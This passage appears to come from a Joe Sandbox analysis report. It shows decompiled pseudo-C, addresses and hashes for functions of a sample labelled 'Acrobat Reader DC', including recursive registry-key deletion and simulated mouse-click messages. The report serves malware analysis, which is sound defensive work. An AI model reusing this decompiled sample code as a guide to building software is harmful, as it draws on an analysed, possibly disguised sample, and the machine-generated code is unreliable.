							if(_t26 != 0) {
								L10:
								E004325E0( *_t32,  &_a8, 1);
								E00432614(_t32);
								_t22 = _a8;
								 *_t32 = _t22;
								return _t22;
							} else {
								return _t26 | 0xffffffff;
							}
						} else {
							return _t25;
						}
					}
				} else {
					_t16 = GetStdHandle(0xfffffff6);
					 *_t32 = _t16;
					if(_t16 == 0xffffffff) {
						L3:
						 *_t32 = 0;
						return  *_t32;
					} else {
						L2:
						E004325E0(_t16, _t32, 1);
						return  *_t32;
					}
				}
			}











                                  0x00443358
                                  0x0044335b
                                  0x0044335e
                                  0x00443365
                                  0x0044336c
                                  0x00443375
                                  0x0044342f
                                  0x004433cf
                                  0x004433d5
                                  0x004433d9
                                  0x004433f9
                                  0x004433ff
                                  0x00443404
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00443431
                                  0x00443431
                                  0x00443435
                                  0x004433b9
                                  0x004433c1
                                  0x0044340a
                                  0x00443413
                                  0x00443419
                                  0x0044341e
                                  0x00443424
                                  0x0044342a
                                  0x004433c3
                                  0x004433ca
                                  0x004433ca
                                  0x0044343f
                                  0x0044343f
                                  0x0044343f
                                  0x00443435
                                  0x0044337b
                                  0x0044337d
                                  0x00443383
                                  0x00443388
                                  0x0044339f
                                  0x0044339f
                                  0x004433ab
                                  0x0044338a
                                  0x0044338a
                                  0x0044338e
                                  0x0044339c
                                  0x0044339c
                                  0x00443388

                                  APIs
                                  • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Handle
                                  • String ID: nul
                                  • API String ID: 2519475695-2873401336
                                  • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                  • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                  • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                  • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00440C49(intOrPtr _a4, struct HWND__** _a8, intOrPtr _a12, WCHAR* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, signed int _a36, long _a40) {
				signed int _t13;
				struct HWND__* _t16;
				int _t20;
				WCHAR* _t24;
				intOrPtr _t25;
				intOrPtr _t29;
				struct HWND__** _t37;

				_t13 = _a36;
				_t29 = _a32;
				_t25 = _a28;
				_t24 = _a16;
				_t37 = _a8;
				if(_t13 != 0xffffffff) {
					if(_t13 < 0x10) {
						goto L13;
					}
				} else {
					_t13 = 2;
					L13:
					_t13 = _t13 | 0x00000002;
				}
				if(_t25 == 0xffffffff) {
					_t25 = 0x96;
				}
				if(_t29 == 0xffffffff) {
					_t29 = 0x96;
				}
				if(_a40 >= 0) {
					if( *_t24 == 0) {
						goto L19;
					} else {
						_t16 = E004301F8(_a4, 0, L"SysAnimate32", 0, _t13, _a20, _a24, _t25, _t29, _a12, 0);
						 *_t37 = _t16;
						if(_t16 == 0) {
							L8:
							return 0;
						} else {
							if(SendMessageW(_t16, 0x467, 0, _t24) != 0) {
								L9:
								if( *0x4a8638 == 0) {
									_t37[0x1f] = 0x300;
								}
								return 1;
							} else {
								_t20 = LoadLibraryW(_t24);
								if(_t20 == 0 || SendMessageW( *_t37, 0x467, _t20, _a40) != 0) {
									goto L9;
								} else {
									DestroyWindow( *_t37);
									goto L8;
								}
							}
						}
					}
				} else {
					L19:
					return 0;
				}
			}










                                  0x00440c4c
                                  0x00440c4f
                                  0x00440c52
                                  0x00440c56
                                  0x00440c5a
                                  0x00440c60
                                  0x00440d07
                                  0x00000000
                                  0x00000000
                                  0x00440c66
                                  0x00440c66
                                  0x00440d09
                                  0x00440d09
                                  0x00440d09
                                  0x00440d0f
                                  0x00440d11
                                  0x00440d11
                                  0x00440d19
                                  0x00440d1b
                                  0x00440d1b
                                  0x00440d24
                                  0x00440c74
                                  0x00000000
                                  0x00440c7a
                                  0x00440c99
                                  0x00440c9e
                                  0x00440ca2
                                  0x00440ce0
                                  0x00440ce6
                                  0x00440ca4
                                  0x00440cb7
                                  0x00440ce9
                                  0x00440cf0
                                  0x00440cf7
                                  0x00440cf7
                                  0x00440d01
                                  0x00440cb9
                                  0x00440cba
                                  0x00440cc2
                                  0x00000000
                                  0x00440cd7
                                  0x00440cda
                                  0x00000000
                                  0x00440cda
                                  0x00440cc2
                                  0x00440cb7
                                  0x00440ca2
                                  0x00440d2b
                                  0x00440d2b
                                  0x00440d2f
                                  0x00440d2f

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: SysAnimate32
                                  • API String ID: 0-1011021900
                                  • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                  • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                  • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                  • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E00441C7B(void* _a4, signed int _a8) {
				int _v8;
				void* _v12;
				int _v16;
				int _v20;
				char _v28;
				struct _FILETIME _v36;
				short _v548;
				int _t29;
				void* _t33;
				void* _t35;
				long _t36;
				signed int _t57;
				void* _t58;
				void* _t59;

				_t58 = _a4;
				_v8 = 0xff;
				if(RegEnumKeyExW(_t58, 0,  &_v548,  &_v8, 0, 0, 0,  &_v36) == 0x103) {
					L10:
					return 1;
				} else {
					_t57 = _a8;
					_t29 = _t57 | 0x00020019;
					_v16 = _t29;
					while(RegOpenKeyExW(_t58,  &_v548, 0, _t29,  &_v12) == 0) {
						_t33 = E00441C7B(_v12, _t57);
						_t59 = _t59 + 8;
						RegCloseKey(_v12);
						if(_t33 == 0) {
							break;
						} else {
							_v28 = 0;
							_v20 = 0;
							_t35 = E00430CB1( &_v28);
							_t63 = _t35;
							if(_t35 == 0) {
								_t36 = RegDeleteKeyW(_t58,  &_v548);
							} else {
								_push(0);
								_push(_t57);
								_push( &_v548);
								_push(_t58);
								_t36 =  *((intOrPtr*)(E00441C58(_t63,  &_v28)))();
							}
							if(_t36 != 0) {
								E00430CCB( &_v28);
								break;
							} else {
								E00430CCB( &_v28);
								_v8 = 0xff;
								if(RegEnumKeyExW(_t58, 0,  &_v548,  &_v8, 0, 0, 0,  &_v36) != 0x103) {
									_t29 = _v16;
									continue;
								} else {
									goto L10;
								}
							}
						}
						goto L13;
					}
					__eflags = 0;
					return 0;
				}
				L13:
			}

















                                  0x00441c86
                                  0x00441ca2
                                  0x00441cb4
                                  0x00441d7f
                                  0x00441d87
                                  0x00441cba
                                  0x00441cba
                                  0x00441cbf
                                  0x00441cc4
                                  0x00441cce
                                  0x00441cf0
                                  0x00441cf8
                                  0x00441cfe
                                  0x00441d06
                                  0x00000000
                                  0x00441d0c
                                  0x00441d12
                                  0x00441d15
                                  0x00441d18
                                  0x00441d1d
                                  0x00441d1f
                                  0x00441d40
                                  0x00441d21
                                  0x00441d21
                                  0x00441d22
                                  0x00441d29
                                  0x00441d2a
                                  0x00441d34
                                  0x00441d34
                                  0x00441d48
                                  0x00441d8c
                                  0x00000000
                                  0x00441d4a
                                  0x00441d4e
                                  0x00441d67
                                  0x00441d79
                                  0x00441ccb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00441d79
                                  0x00441d48
                                  0x00000000
                                  0x00441d06
                                  0x00441d93
                                  0x00441d99
                                  0x00441d99
                                  0x00000000

                                  APIs
                                  • RegEnumKeyExW.ADVAPI32 ref: 00441CA9
                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                  • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                  • RegEnumKeyExW.ADVAPI32 ref: 00441D6E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Enum$CloseDeleteOpen
                                  • String ID:
                                  • API String ID: 2095303065-0
                                  • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                  • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                  • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                  • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 66%
                                  			E00436A0B(struct HWND__** _a4, intOrPtr _a8, intOrPtr _a12, int _a16, int _a20) {
				struct tagRECT _v20;
				intOrPtr _t28;
				struct HWND__* _t33;
				intOrPtr _t37;
				int _t47;
				intOrPtr _t51;
				int _t52;
				struct HWND__* _t54;
				signed short _t57;
				intOrPtr _t58;
				signed short _t63;
				long _t66;

				_t54 =  *_a4;
				_t63 = _a20;
				_t57 = _a16;
				GetWindowRect(_t54,  &_v20);
				if(_t57 == 0xffffffff) {
					asm("cdq");
					_t57 = _v20.right - _v20.left - _t54 >> 1;
				}
				if(_t63 == 0xffffffff) {
					asm("cdq");
					_t63 = _v20.bottom - _v20.top - _t54 >> 1;
				}
				_t66 = (_t63 & 0x0000ffff) << 0x00000010 | _t57 & 0x0000ffff;
				_t28 = _a8;
				_t51 = 1;
				_a16 = 0x201;
				_a20 = 0x203;
				_t47 = 0x202;
				_t58 = 1;
				if(_t28 != 2) {
					if(_t28 == 1) {
						_a16 = 0x207;
						_t47 = 0x208;
						_t58 = 0x10;
						goto L8;
					}
				} else {
					_a16 = 0x204;
					_t47 = 0x205;
					_t58 = _t28;
					L8:
					_a20 = 0x206;
				}
				_a8 = _t51;
				if(_a12 >= _t51) {
					while(1) {
						asm("cdq");
						_push(_t66);
						_t33 =  *_a4;
						_push(_t58);
						if((_t51 - _t54 >> 1) + (_t51 - _t54 >> 1) != _t51) {
							_t52 = _a16;
						} else {
							_t52 = _a20;
						}
						PostMessageW(_t33, _t52, ??, ??);
						Sleep(0);
						_t54 =  *_a4;
						PostMessageW(_t54, _t47, 0, _t66);
						Sleep(0);
						_t37 = _a8 + 1;
						_a8 = _t37;
						if(_t37 > _a12) {
							break;
						}
						_t51 = _a8;
					}
					return 1;
				} else {
					return _t51;
				}
			}















                                  0x00436a11
                                  0x00436a18
                                  0x00436a1c
                                  0x00436a24
                                  0x00436a2d
                                  0x00436a35
                                  0x00436a3a
                                  0x00436a3a
                                  0x00436a3f
                                  0x00436a47
                                  0x00436a4c
                                  0x00436a4c
                                  0x00436a57
                                  0x00436a59
                                  0x00436a5c
                                  0x00436a61
                                  0x00436a68
                                  0x00436a6f
                                  0x00436a74
                                  0x00436a79
                                  0x00436a8d
                                  0x00436a8f
                                  0x00436a96
                                  0x00436a9b
                                  0x00000000
                                  0x00436a9b
                                  0x00436a7b
                                  0x00436a7b
                                  0x00436a82
                                  0x00436a87
                                  0x00436aa0
                                  0x00436aa0
                                  0x00436aa0
                                  0x00436aa7
                                  0x00436aad
                                  0x00436abe
                                  0x00436ac0
                                  0x00436aca
                                  0x00436acd
                                  0x00436acf
                                  0x00436ad0
                                  0x00436ad7
                                  0x00436ad2
                                  0x00436ad2
                                  0x00436ad2
                                  0x00436adc
                                  0x00436ae4
                                  0x00436aed
                                  0x00436af4
                                  0x00436afc
                                  0x00436b05
                                  0x00436b06
                                  0x00436b0c
                                  0x00000000
                                  0x00000000
                                  0x00436abb
                                  0x00436abb
                                  0x00436b16
                                  0x00436aaf
                                  0x00436ab7
                                  0x00436ab7

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: RectWindow
                                  • String ID:
                                  • API String ID: 861336768-0
                                  • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                  • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                  • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                  • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004478AC(struct HWND__* _a4, signed int _a8, signed short _a12, signed short _a16) {
				struct tagPOINT _v12;
				void* _t24;
				signed int _t25;
				signed int _t26;
				intOrPtr _t31;
				int _t41;
				intOrPtr _t42;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t47;
				struct HWND__** _t56;
				struct HWND__* _t57;

				_t41 = _a8;
				_t57 = _a4;
				_t25 = E00430C09(_t24, 0x4a8630, _t57);
				_t42 =  *0x4a8690; // 0x0
				_t56 =  *( *(_t42 + _t25 * 4));
				if(_t41 != _t57) {
					_t26 = E00441B7C(0x4a8630, _t41);
					_a8 = _t26;
					if(_t26 == 0xffffffff) {
						goto L3;
					} else {
						_t44 =  *0x4a86a4; // 0xa51ad0
						_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t44 + _t26 * 4))));
						_t31 =  *((intOrPtr*)(_t45 + 0x88));
						if(_t31 == 0xe || _t31 == 0xf || _t31 == 0x13 || _t31 == 0x10 ||  *((intOrPtr*)(_t45 + 8)) == 0) {
							goto L3;
						} else {
							GetCursorPos( &_v12);
							_t47 =  *0x4a86a4; // 0xa51ad0
							return TrackPopupMenuEx( *( *((intOrPtr*)( *((intOrPtr*)(_t47 + _a8 * 4)))) + 8), 0, _v12.x, _v12.y,  *_t56, 0);
						}
					}
				} else {
					if(_t56[0x69] == 0) {
						L3:
						return DefDlgProcW(_t57, 0x7b, _t41, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
					} else {
						GetCursorPos( &_v12);
						return TrackPopupMenuEx(_t56[0x69], 0, _v12, _v12.y, _t57, 0);
					}
				}
			}















                                  0x004478b3
                                  0x004478b7
                                  0x004478c1
                                  0x004478c6
                                  0x004478cf
                                  0x004478d3
                                  0x00447932
                                  0x00447937
                                  0x0044793d
                                  0x00000000
                                  0x0044793f
                                  0x0044793f
                                  0x00447948
                                  0x0044794a
                                  0x00447952
                                  0x00000000
                                  0x00447966
                                  0x0044796a
                                  0x0044797b
                                  0x0044799d
                                  0x0044799d
                                  0x00447952
                                  0x004478d5
                                  0x004478dc
                                  0x0044790b
                                  0x00447929
                                  0x004478de
                                  0x004478e2
                                  0x00447908
                                  0x00447908
                                  0x004478dc

                                  APIs
                                  • GetCursorPos.USER32(?), ref: 004478E2
                                  • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                  • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                  • GetCursorPos.USER32(00000000), ref: 0044796A
                                  • TrackPopupMenuEx.USER32(?,00000000,00000000,?,?,00000000), ref: 00447991
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CursorMenuPopupTrack$Proc
                                  • String ID:
                                  • API String ID: 1300944170-0
                                  • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                  • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                  • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                  • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E004479A0(struct HWND__* _a4, int _a8, signed short _a12, signed short _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagPOINT _v36;
				struct tagPOINT _v44;
				void* _t30;
				intOrPtr _t32;
				long _t38;
				intOrPtr _t43;
				struct HWND__* _t47;
				signed int _t48;
				intOrPtr _t53;
				intOrPtr _t61;
				intOrPtr _t66;
				struct HWND__* _t75;

				_t75 = _a4;
				_t71 = E00430C09(_t30, 0x4a8630, _t75);
				_t32 =  *0x4a8690; // 0x0
				_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t32 + _t31 * 4))));
				GetClientRect(_t75,  &_v28);
				GetCursorPos( &_v36);
				_v44.x = _v36.x;
				_v44.y = _v36.y;
				ScreenToClient(_t75,  &_v44);
				_t38 = _v44.x;
				if(_t38 < _v28.left || _t38 > _v12) {
					L12:
					return DefDlgProcW(_t75, 0x20, _a8, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				} else {
					_t43 = _v36.y;
					if(_t43 < _v28.bottom || _t43 > _v8) {
						goto L12;
					} else {
						if( *((char*)(_t53 + 0x16c)) == 0) {
							L11:
							_t66 =  *0x4a8690; // 0x0
							E00430737( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t66 + _t71 * 4)))) + 0x10)));
							if( *((intOrPtr*)(_t53 + 0x14)) != 0) {
								goto L10;
							} else {
								goto L12;
							}
						} else {
							_push(_v28.top);
							_t47 = WindowFromPoint(_v28);
							if(_t47 == 0 || _t47 == _t75) {
								goto L11;
							} else {
								_t48 = E00441B7C(0x4a8630, _t47);
								if(_t48 == 0xffffffff) {
									goto L11;
								} else {
									_t61 =  *0x4a86a4; // 0xa51ad0
									_t50 =  *( *((intOrPtr*)( *((intOrPtr*)(_t61 + _t48 * 4)))) + 0x7c) & 0x0000ffff;
									if(( *( *((intOrPtr*)( *((intOrPtr*)(_t61 + _t48 * 4)))) + 0x7c) & 0x0000ffff) == 0xffff) {
										goto L11;
									} else {
										E00430737(_t50);
										L10:
										return 1;
									}
								}
							}
						}
					}
				}
			}


















                                  0x004479ab
                                  0x004479ba
                                  0x004479bc
                                  0x004479c4
                                  0x004479cc
                                  0x004479d7
                                  0x004479eb
                                  0x004479ef
                                  0x004479f3
                                  0x004479f9
                                  0x00447a01
                                  0x00447a98
                                  0x00447ab9
                                  0x00447a11
                                  0x00447a11
                                  0x00447a19
                                  0x00000000
                                  0x00447a21
                                  0x00447a28
                                  0x00447a7e
                                  0x00447a7e
                                  0x00447a8d
                                  0x00447a96
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00447a2a
                                  0x00447a32
                                  0x00447a34
                                  0x00447a3c
                                  0x00000000
                                  0x00447a42
                                  0x00447a48
                                  0x00447a50
                                  0x00000000
                                  0x00447a52
                                  0x00447a52
                                  0x00447a5d
                                  0x00447a65
                                  0x00000000
                                  0x00447a67
                                  0x00447a6b
                                  0x00447a70
                                  0x00447a7b
                                  0x00447a7b
                                  0x00447a65
                                  0x00447a50
                                  0x00447a3c
                                  0x00447a28
                                  0x00447a19

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Client$CursorFromPointProcRectScreenWindow
                                  • String ID:
                                  • API String ID: 1822080540-0
                                  • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                  • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                  • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                  • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00445870(void* __ebx, intOrPtr _a4, struct HWND__* _a8) {
				void* __edi;
				void* __esi;
				WCHAR* _t22;
				long _t24;
				intOrPtr _t26;
				long _t31;
				void* _t34;
				int _t35;
				signed int _t44;
				intOrPtr _t45;
				struct HWND__* _t46;
				WCHAR* _t47;
				void* _t48;
				void* _t49;
				signed int _t54;

				_t34 = __ebx;
				_t46 = _a8;
				if(IsWindowVisible(_t46) != 0 ||  *((char*)(_a4 + 5)) == 1) {
					_t44 = SendMessageW(_t46, 0xe, 0, 0);
					_t54 = _t44;
					if(_t54 == 0) {
						_t44 = 0x7fff;
					}
					_push(_t34);
					_t4 = _t44 + 1; // 0x1
					_t35 = _t4;
					_push( ~(0 | _t54 > 0x00000000) | _t35 * 0x00000002);
					_t22 = E004115D7(_t44, _t46, _t54);
					_t49 = _t48 + 4;
					_t47 = _t22;
					_t24 = SendMessageW(_a8, 0xd, _t35, _t47);
					_t47[_t44] = 0;
					if(_t24 > 0) {
						_t45 = _a4;
						__eflags =  *((intOrPtr*)(_t45 + 0xc));
						if( *((intOrPtr*)(_t45 + 0xc)) == 0) {
							_t31 = E004111C1(_t47);
							_t49 = _t49 + 4;
							CharUpperBuffW(_t47, _t31);
						}
						_t26 = E004134BD(_t47,  *((intOrPtr*)(_t45 + 0x24)));
						_t49 = _t49 + 8;
						_push(_t47);
						__eflags = _t26;
						if(_t26 == 0) {
							goto L6;
						} else {
							 *((char*)(_t45 + 0xe8)) = 1;
							E004111DC();
							__eflags = 0;
							return 0;
						}
					} else {
						_push(_t47);
						L6:
						E004111DC();
						goto L7;
					}
				} else {
					L7:
					return 1;
				}
			}


















                                  0x00445870
                                  0x00445874
                                  0x00445881
                                  0x00445899
                                  0x0044589b
                                  0x0044589d
                                  0x0044589f
                                  0x0044589f
                                  0x004458a4
                                  0x004458a7
                                  0x004458a7
                                  0x004458ba
                                  0x004458bb
                                  0x004458c0
                                  0x004458c3
                                  0x004458cd
                                  0x004458d5
                                  0x004458dc
                                  0x004458f2
                                  0x004458f5
                                  0x004458f8
                                  0x004458fb
                                  0x00445900
                                  0x00445905
                                  0x00445905
                                  0x00445910
                                  0x00445915
                                  0x00445918
                                  0x00445919
                                  0x0044591b
                                  0x00000000
                                  0x0044591d
                                  0x0044591d
                                  0x00445924
                                  0x0044592d
                                  0x00445931
                                  0x00445931
                                  0x004458de
                                  0x004458de
                                  0x004458df
                                  0x004458df
                                  0x00000000
                                  0x004458e4
                                  0x004458e8
                                  0x004458e8
                                  0x004458ef
                                  0x004458ef

                                  APIs
                                  • IsWindowVisible.USER32 ref: 00445879
                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                  • _wcslen.LIBCMT ref: 004458FB
                                  • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
